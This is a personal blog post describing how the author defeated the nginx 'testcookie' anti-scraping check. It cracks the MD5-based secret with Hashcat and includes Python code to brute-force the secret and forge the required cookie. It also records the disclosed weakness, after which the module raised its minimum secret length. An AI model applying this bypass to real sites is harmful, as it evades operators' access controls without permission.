Bypassing the "testcookie" anti-webscraping protection

A few days ago, I noticed that ApkTrack (an Android app I maintain) could no longer query one of the websites it usually obtains data from.
The app works mostly through web scraping, and once in a while the target websites set up new countermeasures to prevent bots (even innocuous ones such as this app) from accessing their content. In this post, we'll see how I bypassed the protection I encountered this weekend.

It all began when I noticed that a website (whose identity will not be disclosed) returned the following script in lieu of the expected data:

<html>
 
<body>
    <script type="text/javascript" src="/aes.min.js"></script>
    <script>
        function toNumbers(d) {
            var e = [];
            d.replace(/(..)/g, function(d) {
                e.push(parseInt(d, 16))
            });
            return e
        }
 
        function toHex() {
            for (var d = [], d = 1 == arguments.length && arguments[0].constructor == Array ? arguments[0] : arguments, e = "", f = 0; f < d.length; f++) e += (16 > d[f] ? "0" : "") + d[f].toString(16);
            return e.toLowerCase()
        }
        var a = toNumbers("5d026cff5942d1ab28e3757e4b2e2f87"),
            b = toNumbers("845dd1e672b840c246aa8cfe9b5d3632"),
            c = toNumbers("e48176221e1325e09b9a959370446f05");
        var now = new Date(),
            time = now.getTime();
        time += 3600 * 1000 * 24;
        now.setTime(time);
        document.cookie = "BKS=" + toHex(slowAES.decrypt(c, 2, a, b)) + "; expires=" + now.toUTCString() + "; path=/";
        location.href = "http://site.com/page/?ckattempt=1";
    </script>
</body>
 
</html>

It's plain to see that this script uses a JavaScript AES implementation (exposed as slowAES) to generate a cookie required to browse the target website. I notice that the a, b and c variables of the above script change with every try, and while they kind of look like MD5 hashes, none of them can be reversed easily. Time to dig in.
Ideally, I'd like to read the code which generates these values. I'm in luck: a quick search points me to an nginx module called testcookie.
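
To compare the values across several attempts, the three hex strings can be pulled out of the challenge page with a regular expression. This is only a sketch: the helper name and the pattern are my own, written against the page quoted above, and would need adjusting if the markup differs.

```python
import re

# Matches the toNumbers("...") calls seen in the challenge page quoted above.
# Assumption: every value is a 32-character hex string, as in that sample.
HEX_ARG = re.compile(r'toNumbers\("([0-9a-fA-F]{32})"\)')

def extract_challenge(html: str):
    """Return (a, b, c) as bytes, or None if the page is not a challenge."""
    values = HEX_ARG.findall(html)
    if len(values) != 3:
        return None
    # bytes.fromhex plays the role of the page's toNumbers() helper
    a, b, c = (bytes.fromhex(v) for v in values)
    return a, b, c

sample = '''
var a = toNumbers("5d026cff5942d1ab28e3757e4b2e2f87"),
    b = toNumbers("845dd1e672b840c246aa8cfe9b5d3632"),
    c = toNumbers("e48176221e1325e09b9a959370446f05");
'''
challenge = extract_challenge(sample)
```

A None result doubles as a cheap way to tell a regular response apart from the challenge page.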

Reading through the 2000-something lines of code is made difficult by the numerous macros coming from nginx, but I understand the following:

  • a and b are the key and initialization vector (respectively) used for the AES-CBC computation; c is the data to decipher.
  • The latter is generated the following way: c = AES(MD5($testcookie_session + $testcookie_secret)), those two variables being defined in the nginx configuration. More precisely:
    • According to the documentation, testcookie_session can either be the visitor's IP address (e.g. 127.0.0.1), or their IP concatenated with the browser's user-agent (e.g. 127.0.0.1Mozilla/5.0 (X11; Ubuntu; Linux x86_64; [...])). This part is predictable and can be generated easily.
    • testcookie_secret, however, is an unknown value. It can be fixed, or random (in which case it changes every time the web server is restarted).
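
The plaintext hidden behind the AES layer can be sketched in a few lines. This assumes, as described above, that it is simply the hex MD5 of the session string followed by the secret; the function names, the UTF-8 encoding and the sample values are placeholders of mine, not taken from the module's source.

```python
import hashlib

def session_value(ip: str, user_agent: str = "") -> str:
    """Session string: the IP alone, or the IP followed by the user-agent."""
    return ip + user_agent

def expected_cookie(session: str, secret: str) -> str:
    """MD5(session + secret) as lowercase hex, per the description above."""
    return hashlib.md5((session + secret).encode("utf-8")).hexdigest()

# Placeholder values, not taken from any real configuration.
cookie = expected_cookie(session_value("127.0.0.1"), "example-secret")
```

The AES step itself is deliberately left out: anyone who can compute this value directly never needs to decrypt c.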

There are basically two ways to bypass this protection. The first way would be to run the JavaScript code just like a browser would. The second way is to somehow guess what the cookie's value is expected to be. The former implies a lot of overhead in my tiny Android app, so I start looking into the latter.
I need to find out how testcookie_session is generated on the target website, since it is configuration-dependent. That part is easy: I take another browser, navigate to the website and compare the cookies: they're identical. Since the two browsers send different user-agents, this means that only the IP address is used. Next, I have to guess testcookie_secret's value. We face the following equation:

  • I know a valid cookie just by visiting the website: 64534e58cbc178830089d06de12c00ed.
  • My IP address at the time was 95.130.11.147.
  • We have established that 64534e58cbc178830089d06de12c00ed = MD5("95.130.11.147" + testcookie_secret).

This is a textbook bruteforce situation. I fire up Hashcat:

PS C:\Users\Ivan\oclHashcat-1.33> .\oclHashcat64.exe -m0 .\targets\site.txt -a7 95.130.11.147 .\dicts\wordlist.txt
oclHashcat v1.33 starting...
[...]
64534e58cbc178830089d06de12c00ed:95.130.11.147keepmesecret

The -a7 option corresponds to a hybrid attack, which means that every word from the dictionary is prefixed with an arbitrary string (here, my IP address). After a while, Hashcat proudly announces the result: testcookie_secret = keepmesecret.
I actually guessed that value before the bruteforce had ended for a simple reason: keepmesecret is the example value given in the documentation and I had tested it manually. When in doubt, always assume the sysadmin was lazy.
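
For small wordlists, the same prefixed dictionary search fits in a few lines of Python. This is a rough equivalent of the idea rather than of Hashcat itself (it is far slower), and the function name, the documentation-range IP address and the demo words are made up for illustration.

```python
import hashlib
from typing import Iterable, Optional

def find_secret(target_hex: str, prefix: str,
                candidates: Iterable[str]) -> Optional[str]:
    """Return the first word such that MD5(prefix + word) equals target_hex."""
    target = target_hex.lower()
    for word in candidates:
        word = word.rstrip("\r\n")  # tolerate lines read straight from a file
        digest = hashlib.md5((prefix + word).encode("utf-8")).hexdigest()
        if digest == target:
            return word
    return None

# Synthetic demo: the target is built from a known secret, then recovered.
demo_target = hashlib.md5(b"203.0.113.5hunter2").hexdigest()
found = find_secret(demo_target, "203.0.113.5", ["letmein", "hunter2"])
```

Passing an open file object as candidates works too, since the function only iterates over lines. Putting the documentation's example values at the head of the list costs nothing.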

We now have everything needed to forge our cookies, and computing an MD5 hash before each request is all it takes to bypass the protection.
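
As an illustration, here is roughly what the forged request looks like in Python. The cookie name BKS and the site.com URL come from the challenge page above; the function name and the IP address are placeholders, and the sketch assumes the client already knows its public IP address as the server sees it.

```python
import hashlib
import urllib.request

def forged_request(url: str, public_ip: str, secret: str,
                   cookie_name: str = "BKS") -> urllib.request.Request:
    """Build a request that already carries the cookie the challenge would set."""
    value = hashlib.md5((public_ip + secret).encode("utf-8")).hexdigest()
    return urllib.request.Request(url, headers={"Cookie": f"{cookie_name}={value}"})

# 203.0.113.5 is a documentation-range address standing in for the real one.
req = forged_request("http://site.com/page/", "203.0.113.5", "keepmesecret")
# urllib.request.urlopen(req) would send it; omitted so the sketch stays offline.
```

If the public IP changes (mobile networks do this often), the cookie has to be recomputed, which is one more reason to build it per request instead of caching it.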

EDIT: Following this post, testcookie_secret's minimum size has been increased to 32 characters in the latest version of the module.
